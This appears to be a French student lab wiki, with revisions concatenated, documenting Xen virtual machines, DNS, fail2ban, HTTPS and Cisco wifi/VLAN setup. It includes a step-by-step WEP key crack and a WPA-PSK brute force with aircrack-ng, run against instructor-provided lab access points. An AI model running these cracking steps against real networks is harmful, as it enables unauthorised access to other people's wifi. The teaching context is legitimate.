Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-15T10:47:59Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>

== Configuration SSH ==
Ces commandes permettent de '''synchroniser l'heure''' du système :<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>Pour configurer le '''ssh sur batman''' on modifie le fichier <code>/etc/xen/SE4.batman.cfg</code> sur capbreton<syntaxhighlight lang="bash">
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]
</syntaxhighlight>Une fois cela fait on peut '''redémarrer''' la VM avec les commandes précédentes.

Ensuite sur batman on doit lancer l'interface :<syntaxhighlight lang="bash">
reboot
ifdown eth1; ifup eth1
</syntaxhighlight>Enfin '''le ssh est fonctionnel''', penser à noter l'adresse IPv6 de votre machine de service afin de rentrer la commande de ssh suivante :<syntaxhighlight lang="bash">
ssh root@<ipv6_eth1_batman>
</syntaxhighlight>

== Mascarade ==
Afin de configu<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-12T16:04:25Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
